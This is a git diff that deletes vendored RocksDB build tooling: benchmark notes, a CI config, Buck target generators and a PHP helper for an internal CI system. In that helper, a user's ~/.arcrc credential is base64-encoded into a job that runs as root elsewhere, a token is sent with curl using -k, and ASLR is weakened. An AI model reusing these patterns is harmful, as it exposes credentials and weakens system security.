-#### Test 2. Bulk Load of keys in Sequential Order
-
-Version 3.11 
-
-* Fillseq: 4.944 micros/op 202k ops/sec;  157.4 MB/s
-
-Version 3.10
-
-* Fillseq: 4.105 micros/op 243.6k ops/sec;  189.6 MB/s 
-
-
-#### Test 3. Random Write
-
-Version 3.11 
-
-* Unbuffered I/O enabled
-* Overwrite: 52.661 micros/op 18.9k ops/sec;   14.8 MB/s
-
-Version 3.10
-
-* Unbuffered I/O enabled 
-* Overwrite: 52.661 micros/op 18.9k ops/sec; 
-
-
-#### Test 4. Random Read
-
-Version 3.11 
-
-* Unbuffered I/O enabled
-* Readrandom: 15.716 micros/op 63.6k ops/sec; 49.5 MB/s 
-
-Version 3.10
-
-* Unbuffered I/O enabled 
-* Readrandom: 15.548 micros/op 64.3k ops/sec; 
-
-
-#### Test 5. Multi-threaded read and single-threaded write
-
-Version 3.11
-
-* Unbuffered I/O enabled
-* Readwhilewriting: 25.128 micros/op 39.7k ops/sec; 
-
-Version 3.10
-
-* Unbuffered I/O enabled 
-* Readwhilewriting: 24.854 micros/op 40.2k ops/sec; 
-
-
-### RocksDB In Memory 
-
-#### Test 1. Point Lookup
-
-Version 3.11
-
-80K writes/sec
-* Write Rate Achieved: 40.5k write/sec;
-* Readwhilewriting: 0.314 micros/op 3187455 ops/sec;  364.8 MB/s (715454999 of 715454999 found)
-
-Version 3.10
-
-* Write Rate Achieved:  50.6k write/sec 
-* Readwhilewriting: 0.316 micros/op 3162028 ops/sec; (719576999 of 719576999 found) 
-
-
-*10K writes/sec*
-
-Version 3.11
-
-* Write Rate Achieved: 5.8k/s write/sec
-* Readwhilewriting: 0.246 micros/op 4062669 ops/sec;  464.9 MB/s (915481999 of 915481999 found)
-
-Version 3.10
-
-* Write Rate Achieved: 5.8k/s write/sec 
-* Readwhilewriting: 0.244 micros/op 4106253 ops/sec; (927986999 of 927986999 found) 
-
-
-#### Test 2. Prefix Range Query
-
-Version 3.11
-
-80K writes/sec
-* Write Rate Achieved:  46.3k/s write/sec
-* Readwhilewriting: 0.362 micros/op 2765052 ops/sec;  316.4 MB/s (611549999 of 611549999 found)
-
-Version 3.10
-
-* Write Rate Achieved: 45.8k/s write/sec 
-* Readwhilewriting: 0.317 micros/op 3154941 ops/sec; (708158999 of 708158999 found) 
-
-Version 3.11
-
-10K writes/sec
-* Write Rate Achieved: 5.78k write/sec
-* Readwhilewriting: 0.269 micros/op 3716692 ops/sec;  425.3 MB/s (837401999 of 837401999 found)
-
-Version 3.10
-
-* Write Rate Achieved: 5.7k write/sec 
-* Readwhilewriting: 0.261 micros/op 3830152 ops/sec; (863482999 of 863482999 found) 
-
-
-We think that there is still big room to improve the performance, which will be an ongoing effort for us.
-
diff --git a/thirdparty/rocksdb/appveyor.yml b/thirdparty/rocksdb/appveyor.yml
deleted file mode 100644
index be9b66b..0000000
--- a/thirdparty/rocksdb/appveyor.yml
+++ /dev/null
@@ -1,15 +0,0 @@
-version: 1.0.{build}
-image: Visual Studio 2015
-before_build:
-- md %APPVEYOR_BUILD_FOLDER%\build
-- cd %APPVEYOR_BUILD_FOLDER%\build
-- cmake -G "Visual Studio 14 2015 Win64" -DOPTDBG=1 -DXPRESS=1 -DPORTABLE=1 ..
-- cd ..
-build:
-  project: build\rocksdb.sln
-  parallel: true
-  verbosity: minimal
-test:
-test_script:
-- ps: build_tools\run_ci_db_test.ps1 -SuiteRun db_basic_test,db_test2,db_test,env_basic_test,env_test -Concurrency 8
-
diff --git a/thirdparty/rocksdb/buckifier/buckify_rocksdb.py b/thirdparty/rocksdb/buckifier/buckify_rocksdb.py
deleted file mode 100644
index a3c8be3..0000000
--- a/thirdparty/rocksdb/buckifier/buckify_rocksdb.py
+++ /dev/null
@@ -1,172 +0,0 @@
-from __future__ import absolute_import
-from __future__ import division
-from __future__ import print_function
-from __future__ import unicode_literals
-from targets_builder import TARGETSBuilder
-from optparse import OptionParser
-import os
-import fnmatch
-import sys
-import tempfile
-
-from util import ColorString
-import util
-
-# tests to export as libraries for inclusion in other projects
-_EXPORTED_TEST_LIBS = ["env_basic_test"]
-
-# Parse src.mk files as a Dictionary of
-# VAR_NAME => list of files
-def parse_src_mk(repo_path):
-    src_mk = repo_path + "/src.mk"
-    src_files = {}
-    for line in open(src_mk):
-        line = line.strip()
-        if len(line) == 0 or line[0] == '#':
-            continue
-        if '=' in line:
-            current_src = line.split('=')[0].strip()
-            src_files[current_src] = []
-        elif '.cc' in line:
-            src_path = line.split('.cc')[0].strip() + '.cc'
-            src_files[current_src].append(src_path)
-    return src_files
-
-
-# get all .cc / .c files
-def get_cc_files(repo_path):
-    cc_files = []
-    for root, dirnames, filenames in os.walk(repo_path):
-        root = root[(len(repo_path) + 1):]
-        if "java" in root:
-            # Skip java
-            continue
-        for filename in fnmatch.filter(filenames, '*.cc'):
-            cc_files.append(os.path.join(root, filename))
-        for filename in fnmatch.filter(filenames, '*.c'):
-            cc_files.append(os.path.join(root, filename))
-    return cc_files
-
-
-# Get tests from Makefile
-def get_tests(repo_path):
-    Makefile = repo_path + "/Makefile"
-
-    # Dictionary TEST_NAME => IS_PARALLEL
-    tests = {}
-
-    found_tests = False
-    for line in open(Makefile):
-        line = line.strip()
-        if line.startswith("TESTS ="):
-            found_tests = True
-        elif found_tests:
-            if line.endswith("\\"):
-                # remove the trailing \
-                line = line[:-1]
-                line = line.strip()
-                tests[line] = False
-            else:
-                # we consumed all the tests
-                break
-
-    found_parallel_tests = False
-    for line in open(Makefile):
-        line = line.strip()
-        if line.startswith("PARALLEL_TEST ="):
-            found_parallel_tests = True
-        elif found_parallel_tests:
-            if line.endswith("\\"):
-                # remove the trailing \
-                line = line[:-1]
-                line = line.strip()
-                tests[line] = True
-            else:
-                # we consumed all the parallel tests
-                break
-    
-    return tests
-
-
-# Prepare TARGETS file for buck
-def generate_targets(repo_path):
-    print(ColorString.info("Generating TARGETS"))
-    # parsed src.mk file
-    src_mk = parse_src_mk(repo_path)
-    # get all .cc files
-    cc_files = get_cc_files(repo_path)
-    # get tests from Makefile
-    tests = get_tests(repo_path)
-
-    if src_mk is None or cc_files is None or tests is None:
-        return False
-
-    TARGETS = TARGETSBuilder("%s/TARGETS" % repo_path)
-    # rocksdb_lib
-    TARGETS.add_library(
-        "rocksdb_lib",
-        src_mk["LIB_SOURCES"] +
-        src_mk["TOOL_LIB_SOURCES"])
-    # rocksdb_test_lib
-    TARGETS.add_library(
-        "rocksdb_test_lib",
-        src_mk.get("MOCK_LIB_SOURCES", []) +
-        src_mk.get("TEST_LIB_SOURCES", []) +
-        src_mk.get("EXP_LIB_SOURCES", []),
-        [":rocksdb_lib"])
-    # rocksdb_tools_lib
-    TARGETS.add_library(
-        "rocksdb_tools_lib",
-        src_mk.get("BENCH_LIB_SOURCES", []) +
-        ["util/testutil.cc"],
-        [":rocksdb_lib"])
-
-    # test for every test we found in the Makefile
-    for test in sorted(tests):
-        match_src = [src for src in cc_files if ("/%s.c" % test) in src]
-        if len(match_src) == 0:
-            print(ColorString.warning("Cannot find .cc file for %s" % test))
-            continue
-        elif len(match_src) > 1:
-            print(ColorString.warning("Found more than one .cc for %s" % test))
-            print(match_src)
-            continue
-
-        assert(len(match_src) == 1)
-        is_parallel = tests[test]
-        TARGETS.register_test(test, match_src[0], is_parallel)
-
-        if test in _EXPORTED_TEST_LIBS:
-            test_library = "%s_lib" % test
-            TARGETS.add_library(test_library, match_src, [":rocksdb_test_lib"])
-    TARGETS.flush_tests()
-
-    print(ColorString.info("Generated TARGETS Summary:"))
-    print(ColorString.info("- %d libs" % TARGETS.total_lib))
-    print(ColorString.info("- %d binarys" % TARGETS.total_bin))
-    print(ColorString.info("- %d tests" % TARGETS.total_test))
-    return True
-
-
-def get_rocksdb_path():
-    # rocksdb = {script_dir}/..
-    script_dir = os.path.dirname(sys.argv[0])
-    script_dir = os.path.abspath(script_dir)
-    rocksdb_path = os.path.abspath(
-        os.path.join(script_dir, "../"))
-
-    return rocksdb_path
-
-def exit_with_error(msg):
-    print(ColorString.error(msg))
-    sys.exit(1)
-
-
-def main():
-    # Generate TARGETS file for buck
-    ok = generate_targets(get_rocksdb_path())
-    if not ok:
-        exit_with_error("Failed to generate TARGETS files")
-
-if __name__ == "__main__":
-    main()
diff --git a/thirdparty/rocksdb/buckifier/rocks_test_runner.sh b/thirdparty/rocksdb/buckifier/rocks_test_runner.sh
deleted file mode 100755
index e1f48a7..0000000
--- a/thirdparty/rocksdb/buckifier/rocks_test_runner.sh
+++ /dev/null
@@ -1,4 +0,0 @@
-#!/usr/bin/env bash
-# Create a tmp directory for the test to use
-TEST_DIR=$(mktemp -d /dev/shm/fbcode_rocksdb_XXXXXXX)
-TEST_TMPDIR="$TEST_DIR" $@ && rm -rf "$TEST_DIR"
diff --git a/thirdparty/rocksdb/buckifier/targets_builder.py b/thirdparty/rocksdb/buckifier/targets_builder.py
deleted file mode 100644
index 7d47d2d..0000000
--- a/thirdparty/rocksdb/buckifier/targets_builder.py
+++ /dev/null
@@ -1,65 +0,0 @@
-from __future__ import absolute_import
-from __future__ import division
-from __future__ import print_function
-from __future__ import unicode_literals
-import targets_cfg
-import pprint
-
-# TODO(tec): replace this with PrettyPrinter
-def pretty_list(lst, indent=6):
-    if lst is None or len(lst) == 0:
-        return ""
-
-    if len(lst) == 1:
-        return "\"%s\"" % lst[0]
-
-    separator = "\",\n%s\"" % (" " * indent)
-    res = separator.join(lst)
-    res = "\n" + (" " * indent) + "\"" + res + "\",\n" + (" " * (indent - 2))
-    return res
-
-
-class TARGETSBuilder:
-    def __init__(self, path):
-        self.path = path
-        self.targets_file = open(path, 'w')
-        self.targets_file.write(targets_cfg.rocksdb_target_header)
-        self.total_lib = 0
-        self.total_bin = 0
-        self.total_test = 0
-        self.tests_cfg = []
-
-    def __del__(self):
-        self.targets_file.close()
-
-    def add_library(self, name, srcs, deps=None, headers=None):
-        if headers is None:
-            headers = "AutoHeaders.RECURSIVE_GLOB"
-        self.targets_file.write(targets_cfg.library_template % (
-            name,
-            headers,
-            pretty_list(srcs),
-            pretty_list(deps)))
-        self.total_lib = self.total_lib + 1
-
-    def add_binary(self, name, srcs, deps=None):
-        self.targets_file.write(targets_cfg.binary_template % (
-            name,
-            pretty_list(srcs),
-            pretty_list(deps)))
-        self.total_bin = self.total_bin + 1
-
-    def register_test(self, test_name, src, is_parallel):
-        exec_mode = "serial"
-        if is_parallel:
-            exec_mode = "parallel"
-        self.tests_cfg.append([test_name, str(src), str(exec_mode)])
-
-        self.total_test = self.total_test + 1
-
-    def flush_tests(self):
-        self.targets_file.write(targets_cfg.unittests_template % (
-            pprint.PrettyPrinter().pformat(self.tests_cfg)
-        ))
-
-        self.tests_cfg = []
diff --git a/thirdparty/rocksdb/buckifier/targets_cfg.py b/thirdparty/rocksdb/buckifier/targets_cfg.py
deleted file mode 100644
index 33023a5..0000000
--- a/thirdparty/rocksdb/buckifier/targets_cfg.py
+++ /dev/null
@@ -1,124 +0,0 @@
-from __future__ import absolute_import
-from __future__ import division
-from __future__ import print_function
-from __future__ import unicode_literals
-rocksdb_target_header = """
-import os
-
-TARGETS_PATH = os.path.dirname(__file__)
-REPO_PATH = "rocksdb/src/"
-BUCK_BINS = "buck-out/gen/" + REPO_PATH
-TEST_RUNNER = REPO_PATH + "buckifier/rocks_test_runner.sh"
-rocksdb_compiler_flags = [
-  "-fno-builtin-memcmp",
-  "-DROCKSDB_PLATFORM_POSIX",
-  "-DROCKSDB_LIB_IO_POSIX",
-  "-DROCKSDB_FALLOCATE_PRESENT",
-  "-DROCKSDB_MALLOC_USABLE_SIZE",
-  "-DROCKSDB_RANGESYNC_PRESENT",
-  "-DROCKSDB_SCHED_GETCPU_PRESENT",
-  "-DROCKSDB_SUPPORT_THREAD_LOCAL",
-  "-DOS_LINUX",
-  # Flags to enable libs we include
-  "-DSNAPPY",
-  "-DZLIB",
-  "-DBZIP2",
-  "-DLZ4",
-  "-DZSTD",
-  "-DGFLAGS=gflags",
-  "-DNUMA",
-  "-DTBB",
-  # Needed to compile in fbcode
-  "-Wno-expansion-to-defined",
-]
-
-rocksdb_external_deps = [
-  ('bzip2', None, 'bz2'),
-  ('snappy', None, "snappy"),
-  ('zlib', None, 'z'),
-  ('gflags', None, 'gflags'),
-  ('lz4', None, 'lz4'),
-  ('zstd', None),
-  ('tbb', None),
-  ("numa", None, "numa"),
-  ("googletest", None, "gtest"),
-]
-
-rocksdb_preprocessor_flags = [
-  # Directories with files for #include
-  "-I" + REPO_PATH + "include/",
-  "-I" + REPO_PATH,
-]
-
-rocksdb_arch_preprocessor_flags = {
-  "x86_64": ["-DHAVE_SSE42"],
-}
-"""
-
-
-library_template = """
-cpp_library(
-    name = "%s",
-    headers = %s,
-    srcs = [%s],
-    deps = [%s],
-    preprocessor_flags = rocksdb_preprocessor_flags,
-    arch_preprocessor_flags = rocksdb_arch_preprocessor_flags,
-    compiler_flags = rocksdb_compiler_flags,
-    external_deps = rocksdb_external_deps,
-)
-"""
-
-binary_template = """
-cpp_binary(
-  name = "%s",
-  srcs = [%s],
-  deps = [%s],
-  preprocessor_flags = rocksdb_preprocessor_flags,
-  arch_preprocessor_flags = rocksdb_arch_preprocessor_flags,
-  compiler_flags = rocksdb_compiler_flags,
-  external_deps = rocksdb_external_deps,
-)
-"""
-
-unittests_template = """
-# [test_name, test_src, test_type]
-ROCKS_TESTS = %s
-
-
-# Generate a test rule for each entry in ROCKS_TESTS
-for test_cfg in ROCKS_TESTS:
-    test_name = test_cfg[0]
-    test_cc = test_cfg[1]
-    ttype = "gtest" if test_cfg[2] == "parallel" else "simple"
-    test_bin = test_name + "_bin"
-
-    cpp_binary (
-      name = test_bin,
-      srcs = [test_cc],
-      deps = [":rocksdb_test_lib"],
-      preprocessor_flags = rocksdb_preprocessor_flags,
-      arch_preprocessor_flags = rocksdb_arch_preprocessor_flags,
-      compiler_flags = rocksdb_compiler_flags,
-      external_deps = rocksdb_external_deps,
-    )
-
-    custom_unittest(
-      name = test_name,
-      type = ttype,
-      deps = [":" + test_bin],
-      command = [TEST_RUNNER, BUCK_BINS + test_bin]
-    )
-
-custom_unittest(
-    name = "make_rocksdbjavastatic",
-    type = "simple",
-    command = ["internal_repo_rocksdb/make_rocksdbjavastatic.sh"],
-)
-
-custom_unittest(
-    name = "make_rocksdb_lite_release",
-    type = "simple",
-    command = ["internal_repo_rocksdb/make_rocksdb_lite_release.sh"],
-)
-"""
diff --git a/thirdparty/rocksdb/buckifier/util.py b/thirdparty/rocksdb/buckifier/util.py
deleted file mode 100644
index 350b733..0000000
--- a/thirdparty/rocksdb/buckifier/util.py
+++ /dev/null
@@ -1,107 +0,0 @@
-"""
-This module keeps commonly used components.
-"""
-from __future__ import absolute_import
-from __future__ import division
-from __future__ import print_function
-from __future__ import unicode_literals
-import subprocess
-import os
-import time
-
-class ColorString:
-    """ Generate colorful strings on terminal """
-    HEADER = '\033[95m'
-    BLUE = '\033[94m'
-    GREEN = '\033[92m'
-    WARNING = '\033[93m'
-    FAIL = '\033[91m'
-    ENDC = '\033[0m'
-
-    @staticmethod
-    def _make_color_str(text, color):
-        return "".join([color, text.encode('utf-8'), ColorString.ENDC])
-
-    @staticmethod
-    def ok(text):
-        if ColorString.is_disabled:
-            return text
-        return ColorString._make_color_str(text, ColorString.GREEN)
-
-    @staticmethod
-    def info(text):
-        if ColorString.is_disabled:
-            return text
-        return ColorString._make_color_str(text, ColorString.BLUE)
-
-    @staticmethod
-    def header(text):
-        if ColorString.is_disabled:
-            return text
-        return ColorString._make_color_str(text, ColorString.HEADER)
-
-    @staticmethod
-    def error(text):
-        if ColorString.is_disabled:
-            return text
-        return ColorString._make_color_str(text, ColorString.FAIL)
-
-    @staticmethod
-    def warning(text):
-        if ColorString.is_disabled:
-            return text
-        return ColorString._make_color_str(text, ColorString.WARNING)
-
-    is_disabled = False
-
-
-def run_shell_command(shell_cmd, cmd_dir=None):
-    """ Run a single shell command.
-        @returns a tuple of shell command return code, stdout, stderr """
-
-    if cmd_dir is not None and not os.path.exists(cmd_dir):
-        run_shell_command("mkdir -p %s" % cmd_dir)
-
-    start = time.time()
-    print("\t>>> Running: " + shell_cmd)
-    p = subprocess.Popen(shell_cmd,
-                         shell=True,
-                         stdout=subprocess.PIPE,
-                         stderr=subprocess.PIPE,
-                         cwd=cmd_dir)
-    stdout, stderr = p.communicate()
-    end = time.time()
-
-    # Report time if we spent more than 5 minutes executing a command
-    execution_time = end - start
-    if execution_time > (60 * 5):
-        mins = (execution_time / 60)
-        secs = (execution_time % 60)
-        print("\t>time spent: %d minutes %d seconds" % (mins, secs))
-
-
-    return p.returncode, stdout, stderr
-
-
-def run_shell_commands(shell_cmds, cmd_dir=None, verbose=False):
-    """ Execute a sequence of shell commands, which is equivalent to
-        running `cmd1 && cmd2 && cmd3`
-        @returns boolean indication if all commands succeeds.
-    """
-
-    if cmd_dir:
-        print("\t=== Set current working directory => %s" % cmd_dir)
-
-    for shell_cmd in shell_cmds:
-        ret_code, stdout, stderr = run_shell_command(shell_cmd, cmd_dir)
-        if stdout:
-            if verbose or ret_code != 0:
-                print(ColorString.info("stdout: \n"), stdout)
-        if stderr:
-            # contents in stderr is not necessarily to be error messages.
-            if verbose or ret_code != 0:
-                print(ColorString.error("stderr: \n"), stderr)
-        if ret_code != 0:
-            return False
-
-    return True
diff --git a/thirdparty/rocksdb/build_tools/RocksDBCommonHelper.php b/thirdparty/rocksdb/build_tools/RocksDBCommonHelper.php
deleted file mode 100644
index 9fe770f..0000000
--- a/thirdparty/rocksdb/build_tools/RocksDBCommonHelper.php
+++ /dev/null
@@ -1,377 +0,0 @@
-<?php
-// Copyright 2004-present Facebook. All Rights Reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-// Name of the environment variables which need to be set by the entity which
-// triggers continuous runs so that code at the end of the file gets executed
-// and Sandcastle run starts.
-define("ENV_POST_RECEIVE_HOOK", "POST_RECEIVE_HOOK");
-define("ENV_HTTPS_APP_VALUE", "HTTPS_APP_VALUE");
-define("ENV_HTTPS_TOKEN_VALUE", "HTTPS_TOKEN_VALUE");
-
-define("PRIMARY_TOKEN_FILE", '/home/krad/.sandcastle');
-define("CONT_RUN_ALIAS", "leveldb");
-
-//////////////////////////////////////////////////////////////////////
-/*  Run tests in sandcastle */
-function postURL($diffID, $url) {
-  assert(strlen($diffID) > 0);
-  assert(is_numeric($diffID));
-  assert(strlen($url) > 0);
-
-  $cmd_args = array(
-    'diff_id' => (int)$diffID,
-    'name' => sprintf(
-      'click here for sandcastle tests for D%d',
-      (int)$diffID
-    ),
-    'link' => $url
-  );
-  $cmd = 'echo ' . escapeshellarg(json_encode($cmd_args))
-         . ' | arc call-conduit differential.updateunitresults';
-
-  shell_exec($cmd);
-}
-
-function buildUpdateTestStatusCmd($diffID, $test, $status) {
-  assert(strlen($diffID) > 0);
-  assert(is_numeric($diffID));
-  assert(strlen($test) > 0);
-  assert(strlen($status) > 0);
-
-  $cmd_args = array(
-    'diff_id' => (int)$diffID,
-    'name' => $test,
-    'result' => $status
-  );
-
-  $cmd = 'echo ' . escapeshellarg(json_encode($cmd_args))
-         . ' | arc call-conduit differential.updateunitresults';
-
-  return $cmd;
-}
-
-function updateTestStatus($diffID, $test) {
-  assert(strlen($diffID) > 0);
-  assert(is_numeric($diffID));
-  assert(strlen($test) > 0);
-
-  shell_exec(buildUpdateTestStatusCmd($diffID, $test, "waiting"));
-}
-
-function getSteps($applyDiff, $diffID, $username, $test) {
-  assert(strlen($username) > 0);
-  assert(strlen($test) > 0);
-
-  if ($applyDiff) {
-    assert(strlen($diffID) > 0);
-    assert(is_numeric($diffID));
-
-    $arcrc_content = (PHP_OS == "Darwin" ?
-        exec("cat ~/.arcrc | gzip -f | base64") :
-            exec("cat ~/.arcrc | gzip -f | base64 -w0"));
-    assert(strlen($arcrc_content) > 0);
-
-    // Sandcastle machines don't have arc setup. We copy the user certificate
-    // and authenticate using that in Sandcastle.
-    $setup = array(
-      "name" => "Setup arcrc",
-      "shell" => "echo " . escapeshellarg($arcrc_content) . " | base64 --decode"
-                 . " | gzip -d > ~/.arcrc",
-      "user" => "root"
-    );
-
-    // arc demands certain permission on its config.
-    // also fix the sticky bit issue in sandcastle
-    $fix_permission = array(
-      "name" => "Fix environment",
-      "shell" => "chmod 600 ~/.arcrc && chmod +t /dev/shm",
-      "user" => "root"
-    );
-
-    // Construct the steps in the order of execution.
-    $steps[] = $setup;
-    $steps[] = $fix_permission;
-  }
-
-  // fbcode is a sub-repo. We cannot patch until we add it to ignore otherwise
-  // Git thinks it is an uncommited change.
-  $fix_git_ignore = array(
-    "name" => "Fix git ignore",
-    "shell" => "echo fbcode >> .git/info/exclude",
-    "user" => "root"
-  );
-
-  // This fixes "FATAL: ThreadSanitizer can not mmap the shadow memory"
-  // Source:
-  // https://github.com/google/sanitizers/wiki/ThreadSanitizerCppManual#FAQ
-  $fix_kernel_issue = array(
-    "name" => "Fix kernel issue with tsan",
-    "shell" => "echo 2 >/proc/sys/kernel/randomize_va_space",
-    "user" => "root"
-  );
-
-  $steps[] = $fix_git_ignore;
-  $steps[] = $fix_kernel_issue;
-
-  // This will be the command used to execute particular type of tests.
-  $cmd = "";
-
-  if ($applyDiff) {
-    // Patch the code (keep your fingures crossed).
-    $patch = array(
-      "name" => "Patch " . $diffID,
-      "shell" => "arc --arcrc-file ~/.arcrc "
-                  . "patch --nocommit --diff " . escapeshellarg($diffID),
-      "user" => "root"
-    );
-
-    $steps[] = $patch;
-
-    updateTestStatus($diffID, $test);
-    $cmd = buildUpdateTestStatusCmd($diffID, $test, "running") . "; ";
-  }
-
-  // Run the actual command.
-  $cmd = $cmd . "J=$(nproc) ./build_tools/precommit_checker.py " .
-           escapeshellarg($test) . "; exit_code=$?; ";
-
-  if ($applyDiff) {
-    $cmd = $cmd . "([[ \$exit_code -eq 0 ]] &&"
-                . buildUpdateTestStatusCmd($diffID, $test, "pass") . ")"
-                . "||" . buildUpdateTestStatusCmd($diffID, $test, "fail")
-                . "; ";
-  }
-
-  // shell command to sort the tests based on exit code and print
-  // the output of the log files.
-  $cat_sorted_logs = "
-    while read code log_file;
-      do echo \"################ cat \$log_file [exit_code : \$code] ################\";
-      cat \$log_file;
-    done < <(tail -n +2 LOG | sort -k7,7n -k4,4gr | awk '{print \$7,\$NF}')";
-
-  // Shell command to cat all log files
-  $cat_all_logs = "for f in `ls t/!(run-*)`; do echo \$f;cat \$f; done";
-
-  // If LOG file exist use it to cat log files sorted by exit code, otherwise
-  // cat everything
-  $logs_cmd = "if [ -f LOG ]; then {$cat_sorted_logs}; else {$cat_all_logs}; fi";
-
-  $cmd = $cmd . " cat /tmp/precommit-check.log"
-              . "; shopt -s extglob; {$logs_cmd}"
-              . "; shopt -u extglob; [[ \$exit_code -eq 0 ]]";
-  assert(strlen($cmd) > 0);
-
-  $run_test = array(
-    "name" => "Run " . $test,
-    "shell" => $cmd,
-    "user" => "root",
-    "parser" => "python build_tools/error_filter.py " . escapeshellarg($test),
-  );
-
-  $steps[] = $run_test;
-
-  if ($applyDiff) {
-    // Clean up the user arc config we are using.
-    $cleanup = array(
-      "name" => "Arc cleanup",
-      "shell" => "rm -f ~/.arcrc",
-      "user" => "root"
-    );
-
-    $steps[] = $cleanup;
-  }
-
-  assert(count($steps) > 0);
-  return $steps;
-}
-
-function getSandcastleConfig() {
-  $sandcastle_config = array();
-
-  $cwd = getcwd();
-  $cwd_token_file = "{$cwd}/.sandcastle";
-  // This is a case when we're executed from a continuous run. Fetch the values
-  // from the environment.
-  if (getenv(ENV_POST_RECEIVE_HOOK)) {
-    $sandcastle_config[0] = getenv(ENV_HTTPS_APP_VALUE);
-    $sandcastle_config[1] = getenv(ENV_HTTPS_TOKEN_VALUE);
-  } else {
-    // This is a typical `[p]arc diff` case. Fetch the values from the specific
-    // configuration files.
-    for ($i = 0; $i < 50; $i++) {
-      if (file_exists(PRIMARY_TOKEN_FILE) ||
-          file_exists($cwd_token_file)) {
-        break;
-      }
-      // If we failed to fetch the tokens, sleep for 0.2 second and try again
-      usleep(200000);
-    }
-    assert(file_exists(PRIMARY_TOKEN_FILE) ||
-           file_exists($cwd_token_file));
-
-    // Try the primary location first, followed by a secondary.
-    if (file_exists(PRIMARY_TOKEN_FILE)) {
-      $cmd = 'cat ' . PRIMARY_TOKEN_FILE;
-    } else {
-      $cmd = 'cat ' . escapeshellarg($cwd_token_file);
-    }
-
-    assert(strlen($cmd) > 0);
-    $sandcastle_config = explode(':', rtrim(shell_exec($cmd)));
-  }
-
-  // In this case be very explicit about the implications.
-  if (count($sandcastle_config) != 2) {
-    echo "Sandcastle configuration files don't contain valid information " .
-         "or the necessary environment variables aren't defined. Unable " .
-         "to validate the code changes.";
-    exit(1);
-  }
-
-  assert(strlen($sandcastle_config[0]) > 0);
-  assert(strlen($sandcastle_config[1]) > 0);
-  assert(count($sandcastle_config) > 0);
-
-  return $sandcastle_config;
-}
-
-// This function can be called either from `[p]arc diff` command or during
-// the Git post-receive hook.
- function startTestsInSandcastle($applyDiff, $workflow, $diffID) {
-  // Default options don't terminate on failure, but that's what we want. In
-  // the current case we use assertions intentionally as "terminate on failure
-  // invariants".
-  assert_options(ASSERT_BAIL, true);
-
-  // In case of a diff we'll send notificatios to the author. Else it'll go to
-  // the entire team because failures indicate that build quality has regressed.
-  $username = $applyDiff ? exec("whoami") : CONT_RUN_ALIAS;
-  assert(strlen($username) > 0);
-
-  if ($applyDiff) {
-    assert($workflow);
-    assert(strlen($diffID) > 0);
-    assert(is_numeric($diffID));
-  }
-
-  // List of tests we want to run in Sandcastle.
-  $tests = array("unit", "unit_non_shm", "unit_481", "clang_unit", "tsan",
-                 "asan", "lite_test", "valgrind", "release", "release_481",
-                 "clang_release", "clang_analyze", "code_cov",
-                 "java_build", "no_compression", "unity", "ubsan");
-
-  $send_email_template = array(
-    'type' => 'email',
-    'triggers' => array('fail'),
-    'emails' => array($username . '@fb.com'),
-  );
-
-  // Construct a job definition for each test and add it to the master plan.
-  foreach ($tests as $test) {
-    $stepName = "RocksDB diff " . $diffID . " test " . $test;
-
-    if (!$applyDiff) {
-      $stepName = "RocksDB continuous integration test " . $test;
-    }
-
-    $arg[] = array(
-      "name" => $stepName,
-      "report" => array($send_email_template),
-      "steps" => getSteps($applyDiff, $diffID, $username, $test)
-    );
-  }
-
-  // We cannot submit the parallel execution master plan to Sandcastle and
-  // need supply the job plan as a determinator. So we construct a small job
-  // that will spit out the master job plan which Sandcastle will parse and
-  // execute. Why compress the job definitions? Otherwise we run over the max
-  // string size.
-  $cmd = "echo " . base64_encode(json_encode($arg))
-         . (PHP_OS == "Darwin" ?
-             " | gzip -f | base64" :
-                 " | gzip -f | base64 -w0");
-  assert(strlen($cmd) > 0);
-
-  $arg_encoded = shell_exec($cmd);
-  assert(strlen($arg_encoded) > 0);
-
-  $runName = "Run diff " . $diffID . "for user " . $username;
-
-  if (!$applyDiff) {
-    $runName = "RocksDB continuous integration build and test run";
-  }
-
-  $command = array(
-    "name" => $runName,
-    "steps" => array()
-  );
-
-  $command["steps"][] = array(
-    "name" => "Generate determinator",
-    "shell" => "echo " . $arg_encoded . " | base64 --decode | gzip -d"
-               . " | base64 --decode",
-    "determinator" => true,
-    "user" => "root"
-  );
-
-  // Submit to Sandcastle.
-  $url = 'https://interngraph.intern.facebook.com/sandcastle/create';
-
-  $job = array(
-    'command' => 'SandcastleUniversalCommand',
-    'args' => $command,
-    'capabilities' => array(
-      'vcs' => 'rocksdb-int-git',
-      'type' => 'lego',
-    ),
-    'hash' => 'origin/master',
-    'user' => $username,
-    'alias' => 'rocksdb-precommit',
-    'tags' => array('rocksdb'),
-    'description' => 'Rocksdb precommit job',
-  );
-
-  // Fetch the configuration necessary to submit a successful HTTPS request.
-  $sandcastle_config = getSandcastleConfig();
-
-  $app = $sandcastle_config[0];
-  $token = $sandcastle_config[1];
-
-  $cmd = 'curl -s -k '
-          . ' -F app=' . escapeshellarg($app)
-          . ' -F token=' . escapeshellarg($token)
-          . ' -F job=' . escapeshellarg(json_encode($job))
-          .' ' . escapeshellarg($url);
-
-  $output = shell_exec($cmd);
-  assert(strlen($output) > 0);
-
-  // Extract Sandcastle URL from the response.
-  preg_match('/url": "(.+)"/', $output, $sandcastle_url);
-
-  assert(count($sandcastle_url) > 0, "Unable to submit Sandcastle request.");
-  assert(strlen($sandcastle_url[1]) > 0, "Unable to extract Sandcastle URL.");
-
-  if ($applyDiff) {
-    echo "\nSandcastle URL: " . $sandcastle_url[1] . "\n";
-    // Ask Phabricator to display it on the diff UI.
-    postURL($diffID, $sandcastle_url[1]);
-  } else {
-    echo "Continuous integration started Sandcastle tests. You can look at ";
-    echo "the progress at:\n" . $sandcastle_url[1] . "\n";
-  }
-}
-
-// Continuous run cript will set the environment variable and based on that
-// we'll trigger the execution of tests in Sandcastle. In that case we don't
-// need to apply any diffs and there's no associated workflow either.
-if (getenv(ENV_POST_RECEIVE_HOOK)) {
-  startTestsInSandcastle(
-    false /* $applyDiff */,
-    NULL /* $workflow */,
-    NULL /* $diffID */);
-}
diff --git a/thirdparty/rocksdb/build_tools/amalgamate.py b/thirdparty/rocksdb/build_tools/amalgamate.py
deleted file mode 100755
index 548b1e8..0000000
--- a/thirdparty/rocksdb/build_tools/amalgamate.py
+++ /dev/null
@@ -1,110 +0,0 @@
-#!/usr/bin/python
-
-# amalgamate.py creates an amalgamation from a unity build.
-# It can be run with either Python 2 or 3.
-# An amalgamation consists of a header that includes the contents of all public
-# headers and a source file that includes the contents of all source files and
-# private headers.
-#
